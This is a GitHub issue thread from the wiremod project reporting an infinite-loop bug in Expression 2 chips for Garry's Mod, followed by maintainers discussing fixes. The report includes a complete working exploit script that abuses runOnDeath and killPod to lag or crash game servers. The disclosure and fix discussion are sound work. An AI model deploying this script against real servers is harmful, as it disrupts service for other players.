### ISSUE TITLE
[E2] runOnDeath & killPod infinite loop

### ISSUE THREAD

**Issue by Fasteroid** [wiremod/wire#2258]
When combined, `runOnDeath` and `killPod` can produce endless recursion at the Lua level and allow e2 chips to execute an unspecified number of times in a single tick, which can be used to lag and/or crash servers.

In this example, the chip will execute 512 times in a single tick following a player sitting in the spawned seat:
[ultra_suicide_crash.txt](https://github.com/Fasteroid/expression2-public/blob/master/exploits/ultra_suicide_crash.txt)
```c
@name exploits/ultra_suicide_crash
@inputs 
@outputs 
@persist MAX_DEATH CHAIR:entity DEATHS
@trigger

# concept by <unknown>
# shown to me by FaZe 360 = Disconnect
# causes a lua-level stack overflow

if( first() ){
    CHAIR = seatSpawn("models/nova/chair_plastic01.mdl", 1)
    runOnDeath(1)
    runOnTick(1)
    MAX_DEATH = 512
}

if( CHAIR:driver():isValid() & DEATHS < MAX_DEATH ){
    runOnTick(0)
    DEATHS++
    timer("reset",5000)
    CHAIR:killPod()
}

if( clk("reset") ){
    DEATHS = 0
    runOnTick(1)    
}
```
In my testing I was able to cause several seconds of server hanging with this chip.

I propose limiting the number of times each chip is allowed to execute in a single tick.  This would prevent abuse of both this issue and any similar ones found in the future.

**Comment by Divran** [comment]
The main problem here seems to be the fact that executing the e2 doesn't cost any ops, and your code isn't doing very much that does cost ops, so because the cost of executing the e2 is 1000x more expensive than running the code, you are able to freeze the server.

Therefore, another solution to this problem would probably be to make executing the e2 at all cost some amount of ops. Advantage is that we woulnd't need to add a separate convar for "max X executions per tick" and people who want to avoid that limit can just use the unlimited convar or increase max ops to infinity.

**Comment by Vurv78** [comment]
Maybe killPod should only run if health is 0? Timer is probably the best bet though

**Comment by Divran** [comment]
Actually if we're gonna fix only this case then the best fix might just be to have killpod check if the player is alive before killing...
